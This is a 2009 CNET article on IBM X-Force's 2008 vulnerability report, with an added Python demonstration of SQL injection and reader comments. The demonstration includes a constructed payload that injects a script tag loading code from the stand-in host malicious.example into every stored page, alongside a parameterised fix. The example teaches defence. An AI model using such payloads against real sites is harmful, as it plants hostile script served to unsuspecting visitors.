February 2, 2009 10:53 AM PST

IBM report: Vulnerabilities still going unpatched

by Elinor Mills

More than half of the security vulnerabilities disclosed during 2008 had no patches available from the vendor by the end of the year, according to a report released on Monday by IBM's X-Force research group.

Vendors with the most vulnerabilities disclosed in 2008.

(Credit: IBM X-Force)

Meanwhile, 46 percent of vulnerabilities from 2006 and 44 percent from 2007 still had no patch by the end of 2008, the 2008 X-Force Trend and Risk report said. X-Force documented a record number of 7,406 new vulnerabilities last year.

Overall, Microsoft is the vendor that tops the list by share of vulnerabilities disclosed in 2008 (disclosed, not unpatched), the report said, and Apple's Mac OS X and the base Linux kernel have held the top spots for vulnerabilities by operating system over the past three years. The report gives no breakdown by vendor or operating system of which vulnerabilities remain unpatched.

Most of the spam last year appeared to originate in Russia (12 percent), followed by the U.S. (9.6 percent) and Turkey (7.8 percent), although these figures reflect where the sending machines were; the people behind the spam could be located elsewhere, the report says.

China unseated the U.S. as the country hosting the largest number of malicious Web sites for the first time last year.

Meanwhile, 46 percent of all malware attacks last year were Trojans targeting people playing online games and doing online banking, and 90 percent of phishing attacks targeted financial institutions, according to the report.

Two main techniques attackers used last year were SQL injection, in which attacker-supplied input is run as part of the Web application's own database queries (in 2008 this was typically used to insert a small malicious script into the database content that feeds the Web site's pages, so that every visitor receives it), and malicious URLs hosting exploits.
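To make the SQL injection pattern concrete, here is a small added example (written for this page; it is not code from the X-Force report or from CNET). It uses a constructed in-memory SQLite table standing in for a site's content database, a constructed attacker payload, a placeholder URL (malicious.example) and hypothetical function names. Python's sqlite3 executescript, which accepts several statements in one string, stands in for the batched-statement behaviour of the database drivers the 2008 mass-injection attacks relied on; a single-statement API would stop this particular payload but not SQL injection in general.

```python
import sqlite3

# Constructed sample data: a tiny content table of the kind that feeds a
# Web site's pages, plus a per-article view counter.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, "
        "body TEXT, views INTEGER DEFAULT 0)"
    )
    conn.executemany(
        "INSERT INTO articles (title, body) VALUES (?, ?)",
        [("Welcome", "<p>Hello</p>"), ("News", "<p>Report out</p>")],
    )
    conn.commit()
    return conn

# Constructed attacker-controlled request parameter (hypothetical). It ends the
# intended statement and appends an UPDATE that tags every stored page with a
# script tag, the shape of the 2008 mass-injection payloads.
PAYLOAD = ("1; UPDATE articles SET body = body || "
           "'<script src=\"http://malicious.example/x.js\"></script>'")

def vulnerable_count_view(conn, article_id):
    """Builds the SQL by string concatenation and runs it through an API that
    accepts several statements at once, so the request parameter becomes SQL."""
    sql = "UPDATE articles SET views = views + 1 WHERE id = " + article_id
    conn.executescript(sql)  # batched statements: the appended UPDATE runs too
    conn.commit()

def safe_count_view(conn, article_id):
    """Checks the parameter's type and binds it with a placeholder, so the
    database never interprets attacker input as SQL text."""
    article_id = int(article_id)  # ValueError on anything that is not a number
    conn.execute("UPDATE articles SET views = views + 1 WHERE id = ?",
                 (article_id,))
    conn.commit()

def render(conn):
    """Returns the page HTML the site would serve from the stored content."""
    rows = conn.execute("SELECT title, body FROM articles ORDER BY id").fetchall()
    return "\n".join(f"<h2>{title}</h2>{body}" for title, body in rows)

def views(conn, article_id):
    """View counter for one article, read back with a bound parameter."""
    row = conn.execute("SELECT views FROM articles WHERE id = ?",
                       (article_id,)).fetchone()
    return row[0]

if __name__ == "__main__":
    db = make_db()
    vulnerable_count_view(db, PAYLOAD)
    print(render(db))  # every article now carries the injected <script> tag

    db = make_db()
    try:
        safe_count_view(db, PAYLOAD)
    except ValueError as err:
        print("rejected:", err)
    print(render(db))  # stored content is unchanged
```

The point of the hardened version is the bound parameter: the value travels to the database separately from the statement text, so no quoting trick in the input can change what the statement does. The int() check is a second, cheaper line of defence that also rejects the payload before any query runs.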

The operating systems with the most vulnerability disclosures in 2008.

(Credit: IBM X-Force)

Updated 2:25 p.m. PST to add that report does not list which vendors and operating system platforms had the most unpatched vulnerabilities.

Elinor Mills covers Internet security and privacy. She joined CNET News in 2005 after working as a foreign correspondent for Reuters in Portugal and writing for The Industry Standard, the IDG News Service, and the Associated Press.
Comments (8)
by GajaKannan February 2, 2009 12:44 PM PST
Sounds like cumulative vulnerabilities disclosed by Microsoft (XP, Vista, 2000, 2003 Server and 2008) is 24.7% vs. Apple (OS X Server and OS X) is 28.6%... Given the footprint of Windows vs. Apple, this sounds like a heck of a lot of issues with Apple... Is this really true? Also, Windows versions seem to cover from 2000 (except 'Me'); Apple, Solaris, IBM and Linux all show little or no breakdown of how old the versions are... Any real breakdowns?
by Seaspray0 February 2, 2009 2:48 PM PST
I agree. Was there a breakdown by revision? How the vulnerability counts were obtained is vague in this article.
by quux February 2, 2009 12:59 PM PST
"While Microsoft is the vendor that tops the list in percentage of vulnerabilities disclosed ..."

Please clarify. Did you switch to a plain list of disclosed vulns at this point in the article, or did you mean to continue speaking of vulnerabilities disclosed *but not patched* ?
by elinormills February 2, 2009 2:22 PM PST
That refers to disclosed vulnerabilities and not unpatched ones. I'll clarify it in the article.
by captainabab February 2, 2009 3:22 PM PST
Does the first list (Vendors with the most vulnerabilities disclosed in 2008) include ALL software from that vendor? (OS / Apps / Servers / IDEs etc.)

I assume so as Oracle, Mozilla, Drupal, Joomla! are on that list and they don't make operating systems.

If so, that is meaningless unless it is divided by the amount of software measured. So Microsoft makes the top of the list because it makes a wide variety of software. I also assume some of the Linux vendors get a break here because many Linux vulnerabilities are non-vendor-specific.

I would be more concerned about a vendor (Joomla!) that makes one product (a CMS) being only one percent behind a vendor like Microsoft that makes mobile, client & server operating systems, desktop applications, database servers, email servers, internet servers, browsers, a CMS (SharePoint), IDEs and other programming tools and runtimes, Mac software, Enterprise apps (Dynamics), security tools, entertainment software / games, etc.
by SneezingPanda February 3, 2009 1:21 AM PST
The link to the source in the article would be helpful. For the interested: http://www-935.ibm.com/services/us/iss/xforce/trendreports/xforce-2008-annual-report.pdf
by AmyStephen February 3, 2009 5:07 AM PST
I'm shocked! To the best of my knowledge, this is the second year now that IBM has published such claims against free software projects without contacting the projects to disclose specific problems.

It's not difficult to locate contact information. Google Security Project Name and links are at the top.

- Drupal - http://drupal.org/security
- Joomla! - http://developer.joomla.org/security.html
- Typo 3 - http://typo3.org/teams/security/

This is corporate bullyism at its finest. If IBM wants to increase software security, step one is contacting those people with these so-called known issues so that they can bring necessary improvements. Then, if your PR guys insist on credit, contact the media and blow your own horn.

For 25 years, I've always been a fan of Big Blue. Shame on you, IBM!
by elinwaring February 4, 2009 2:54 AM PST
The problem with this list, is that it punishes applications for disclosing vulnerabilities. The Joomla! project is committed to disclosing security issues along with providing patches as soon as we can when a vulnerability is brought to light. I am proud to say that Joomla! has 100% disclosure of vulnerabilities and 100% patched.

Many of the vulnerabilities patched this year never resulted in a single problem because they were discovered by community members who brought them to the attention of the security team. That is how community driven open source development works. That is how transparency and education about security makes applications more secure. Openness is also how we get our user community to understand the need to update when a security release is made. Being open with our user and developer community about issues that are discovered is a good thing, and I cannot understand why IBM would seek to discourage it.

For a great example of how open source projects such as Joomla! respond to security issues, take a look at this article.
http://developer.joomla.org/coordinator-blog/245-how-joomla-156-came-about.html

From the last lines:

Total time from report of vulnerability to initial release: 2 hours 50 minutes

Total time from report of vulnerability to completion of the release cycle: 3 hours 40 minutes

Total number of people directly involved: between 20 and 30

I think Joomla! has plenty to be proud of when it comes to how it handles vulnerabilities.